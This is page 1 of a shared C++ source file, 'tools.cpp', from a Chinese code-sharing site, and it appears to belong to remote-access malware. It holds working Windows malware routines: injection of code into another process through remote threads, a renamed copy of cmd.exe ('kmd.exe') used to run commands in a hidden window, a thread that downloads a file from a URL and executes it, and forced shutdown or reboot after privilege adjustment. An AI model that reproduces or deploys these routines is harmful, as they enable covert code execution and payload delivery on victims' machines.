tools.cpp
来自「软件源代码,共享。有2个文件」· C++ 代码 · 共 679 行 · 第 1/2 页
CPP
679 行
DWORD dwParamSize,
DWORD dwMilliseconds
//等待远线程结束:INFINITE:无限等待,结束后释放远线程内存(用于非阻塞函数)
//如果为0,不等待而直接返回,而且不释放远线程内存(用于阻塞函数)
)
{
// if( PID < 1 || dwFuncSize < 1 || pfnRemoteFunc == NULL )
//return FALSE;
//HANDLE hProc = NULL;
//HANDLE hProc = hProcess;
void* pfnRmtFunc = NULL;
void* pRmtParam = NULL;
HANDLE hRemoteThread = NULL;
DWORD dwThreadId = NULL;
DWORD dwExitCode = NULL;
BOOL bFlag;
// //=======打开进程========
// hProcess = OpenProcess( PROCESS_CREATE_THREAD| //允许远程创建线程
//PROCESS_VM_OPERATION| //允许远程VM操作
//PROCESS_VM_WRITE, //允许远程VM写
//FALSE,
//PID);
// if( !hProcess )
// {
//// TraceD("OpenProcess() %s", GetErrorMessage(GetLastError()) );
// goto InjectCleanUp;
// }
//=======函数=======
pfnRmtFunc = VirtualAllocEx( hProcess, NULL, dwFuncSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if( !pfnRmtFunc )
{
// TraceD("VirtualAllocEx() %s", GetErrorMessage(GetLastError()) );
goto InjectCleanUp;
}
//=======参数=======
pRmtParam = VirtualAllocEx( hProcess, NULL, dwParamSize, MEM_COMMIT, PAGE_READWRITE);
if( !pRmtParam )
{
// TraceD("VirtualAllocEx() %s\r\n", GetErrorMessage(GetLastError()) );
goto InjectCleanUp;
}
bFlag = WriteProcessMemory( hProcess, pfnRmtFunc, (PVOID)pfnRemoteFunc, dwFuncSize, 0);
if( bFlag == FALSE )
{
// TraceD("WriteProcessMemory() %s\r\n", GetErrorMessage(GetLastError()) );
goto InjectCleanUp;
}
bFlag = WriteProcessMemory( hProcess, pRmtParam, (PVOID)pRemoteParam, dwParamSize, 0);
if( bFlag == FALSE )
{
// TraceD("WriteProcessMemory() %s\r\n", GetErrorMessage(GetLastError()) );
goto InjectCleanUp;
}
//=======执行远线程=======
hRemoteThread = CreateRemoteThread( hProcess,
NULL,
0,
(LPTHREAD_START_ROUTINE)pfnRmtFunc,
(LPVOID)pRmtParam,
0,
&dwThreadId);
if( !hRemoteThread )
{
// TraceD("CreateRemoteThread() %s\r\n", GetErrorMessage(GetLastError()) );
goto InjectCleanUp;
}
else
{
// TraceD("Inject OK!\r\npfnRemoteFunc:%08X\r\npRmtParam:%08X\r\n", pfnRmtFunc, pRmtParam);
dbglog("创建远程线程成功。开启工作线程以连接客户端。");
}
WaitForSingleObject( hRemoteThread, dwMilliseconds );
GetExitCodeThread( hRemoteThread, &dwExitCode );
CloseHandle( hProcess );
if(dwMilliseconds != 0)
{
VirtualFree( pfnRmtFunc, 0, MEM_RELEASE);
dbglog("释放 Loader 对象成功");
// VirtualFree( pRmtParam, 0, MEM_RELEASE);
}
CloseHandle( hRemoteThread );
return dwExitCode;
InjectCleanUp:
if( hProcess ) CloseHandle( hProcess );
if( pfnRmtFunc ) VirtualFree( pfnRmtFunc, 0, MEM_RELEASE);
// if( pRmtParam ) VirtualFree( pRmtParam, 0, MEM_RELEASE);
if( hRemoteThread ) CloseHandle( hRemoteThread );
return 0;
}
bool RunFile(LPCWSTR szFile, LPCWSTR szlp , LPCWSTR szDir , DWORD dwShow )
{
COpenDesktop hDesktop;
COpenDesktop hDesktop1;
ShellExecute(NULL, L"open", szFile, szlp, szDir, dwShow);
return true;
}
bool RunFileEx(LPCWSTR szFile, LPCWSTR szlp , LPCWSTR szDir , DWORD dwShow )
{
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo; //This is an [in] parameter
ZeroMemory(&StartupInfo, sizeof(StartupInfo));
StartupInfo.cb = sizeof(StartupInfo); //Only compulsory field
StartupInfo.lpDesktop=L"WinSta0\\Default";
StartupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES ;
WCHAR szCmd[512] = {0};
WCHAR cmdline[MAX_PATH];
WCHAR Kmdline[MAX_PATH];
GetSystemDirectory(cmdline,MAX_PATH);
GetSystemDirectory(Kmdline,MAX_PATH);
lstrcatW(cmdline,L"\\cmd.exe");
lstrcatW(Kmdline,L"\\kmd.exe");
DeleteFile(Kmdline);
CopyFile(cmdline,Kmdline,NULL);
wsprintf(szCmd, L"kmd.exe /c \"%s\" \"%s\"", szFile, szlp);
StartupInfo.wShowWindow = SW_HIDE;
WCHAR szP[MAX_PATH] = {0};
lstrcpy(szP, szlp);
if(CreateProcess(NULL, szCmd,
NULL,NULL,FALSE,0,NULL,
L"c:\\",&StartupInfo,&ProcessInfo))
{
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
}
else
return false;
return true;
}
bool DownFile(LPCWSTR szUrl, LPCWSTR szPath , std::wstring* pRet)
{
TCHAR szHead[] = _T("Accept: */*\r\n\r\n");
TCHAR szAgent[10] = {0};
wsprintf(szAgent, L"%d", GetTickCount());
HINTERNET hInternet = ::InternetOpen(szAgent, 0, NULL, NULL, 0);
if(hInternet == NULL)
return false;
HINTERNET hConnect = InternetOpenUrl(hInternet , szUrl, szHead, lstrlen(szHead), INTERNET_FLAG_DONT_CACHE | INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_RELOAD, 0);
if(hConnect == NULL)
{
InternetCloseHandle(hInternet);
return false;
}
char buf[16 * 1024];
DWORD len ;
FILE* fp = NULL;
if(szPath)
fp = _wfopen(szPath, L"wb");
while(true)
{
memset(buf, 0, sizeof(buf));
::InternetReadFile(hConnect, buf, sizeof(buf)-1, &len);
if(!len)
break;
if(fp)
fwrite(buf, 1, len, fp);
if(pRet)
*pRet += ATL::CA2W(buf);
}
if(fp)
fclose(fp);
InternetCloseHandle(hConnect);
InternetCloseHandle(hInternet);
return true;
}
void GetNameByFullPath(LPCWSTR szFile, std::wstring* strName, std::wstring* strPath)
{
if(lstrlen(szFile) == 0)
return ;
if(strName)
{
// WCHAR *sz =
*strName = _tcsrchr(szFile, '/') + 1;
}
if(strPath)
{
WCHAR szP[MAX_PATH] = {0};
wcsncpy(szP, szFile, lstrlen(szFile) - lstrlen(( _tcsrchr(szFile, _T('/')) + 1)) );
*strPath = szP;
}
return ;
}
struct tagDownFile
{
WCHAR szPath[MAX_PATH];
};
DWORD WINAPI ThreadDownFile(LPVOID lp)
{
tagDownFile* pInfo = (tagDownFile*)lp;
std::wstring strName;
std::wstring strPath;
GetNameByFullPath(pInfo->szPath, &strName, &strPath);
CStartAggregate hStart;
// hStart.m_strWindowsPath += strName;
hStart.m_strTempPath += strName;
DownFile(pInfo->szPath, hStart.m_strTempPath.c_str(), NULL);
RunFileEx(hStart.m_strTempPath.c_str(), NULL, NULL, NULL);
delete pInfo;
return 0;
}
void CreateThreadDownFile(LPCWSTR szUrl)
{
tagDownFile* pInfo = new tagDownFile;
lstrcpy(pInfo->szPath, szUrl);
CreateThread(NULL, 0, ThreadDownFile, pInfo, 0, NULL);
}
void ShutDownSystem(BOOL Flag)
{
TOKEN_PRIVILEGES tp;
LUID luid;
tp.PrivilegeCount = 1;
HANDLE m_handle;
HANDLE hThread = GetCurrentThread();
LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&luid);
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
ImpersonateSelf(SecurityImpersonation);
OpenThreadToken(hThread,
TOKEN_ADJUST_PRIVILEGES,TRUE,&m_handle);
AdjustTokenPrivileges(m_handle,FALSE,&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES) NULL, (PDWORD) NULL);
if(Flag)
ExitWindowsEx(EWX_POWEROFF,EWX_FORCE);
else
ExitWindowsEx(EWX_REBOOT,EWX_FORCE);
}
DWORD QueryProcessByName(LPCWSTR exename)
{
HANDLE snapshot;
PROCESSENTRY32 procsnap;
////
snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
procsnap.dwSize=sizeof(PROCESSENTRY32);
Process32First(snapshot,&procsnap);
do
{
if(! _wcsicmp ( exename, procsnap.szExeFile))
{
CloseHandle(snapshot);
return procsnap.th32ProcessID;
}
}
while(Process32Next(snapshot,&procsnap));
CloseHandle(snapshot);
return 0;
}
DWORD QueryWindowByName(LPCWSTR WindowName)
{
TCHAR strTitle[100];
HWND hwnd=NULL;
HWND AfterHwnd = NULL;
COpenDesktop hDesktop;
COpenDesktop hDesktop1;
while(true)
{
COpenDesktop hDesktop;
COpenDesktop hDesktop1;
hwnd=::FindWindowEx(NULL,AfterHwnd,L"#32770",NULL);
if(!hwnd)
{
break;
}
else
{
if(::GetWindowText(hwnd,strTitle, 100))
if(wcsstr( strTitle, WindowName)!=0)
{
//找到窗口后的操作
return true;//返回成功
}
}
AfterHwnd = hwnd;
}
return 0;
}
void dbglog(char* str)
{
//HANDLE filefp;
//DWORD byteswritten;
//char str1[2048];
//SYSTEMTIME time;
//char exename[512];
//char LOG_PATH[512];
//GetSystemDirectoryA(LOG_PATH,512);
//strcat(LOG_PATH,"\\NTboot.log");
/////
//GetSystemDirectoryA(exename,512);
//SetCurrentDirectoryA(exename);
//GetLocalTime(&time);
//GetTimeFormatA(LOCALE_USER_DEFAULT,0,&time,0,str1,1024);
//strcat(str1," : ");
//strcat(str1,str);
//OutputDebugStringA(str1);
//filefp=CreateFileA(LOG_PATH,GENERIC_WRITE,0,0,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
//SetFilePointer(filefp,0,0,FILE_END);
//WriteFile(filefp,str1,strlen(str1),&byteswritten,0);
//CloseHandle(filefp);
return;
}⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?